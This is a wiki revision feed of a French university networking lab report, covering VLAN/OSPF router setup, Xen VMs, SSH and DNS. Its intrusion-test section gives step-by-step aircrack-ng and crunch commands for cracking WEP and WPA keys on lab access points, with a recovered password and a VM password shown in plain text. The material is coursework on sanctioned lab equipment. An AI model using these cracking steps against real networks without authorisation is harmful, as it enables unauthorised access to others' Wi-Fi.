&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56976</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56976"/>
				<updated>2021-12-13T15:06:04Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:DA:D2:9C:50:53 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid 44:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56975</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56975"/>
				<updated>2021-12-13T15:05:00Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 86400&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site.      postmaster.anosteke59.site. (&lt;br /&gt;
                         2021112901      ; serial number YYMMDDNN&lt;br /&gt;
                         28800           ; Refresh&lt;br /&gt;
                         7200            ; Retry&lt;br /&gt;
                         864000          ; Expire&lt;br /&gt;
                         86400           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
                 NS      ns.anosteke59.site.&lt;br /&gt;
                 NS      ns6.gandi.net. &lt;br /&gt;
 $ORIGIN anosteke59.site.&lt;br /&gt;
 ns  IN A   193.48.57.182&lt;br /&gt;
 www IN CNAME ns&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
nslookup anosteke59.site &lt;br /&gt;
dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:AD:D9:5F:87:04 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 3 --bssid 44:AD:D9:5F:87:04 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56974</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56974"/>
				<updated>2021-12-13T15:04:50Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WPA */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
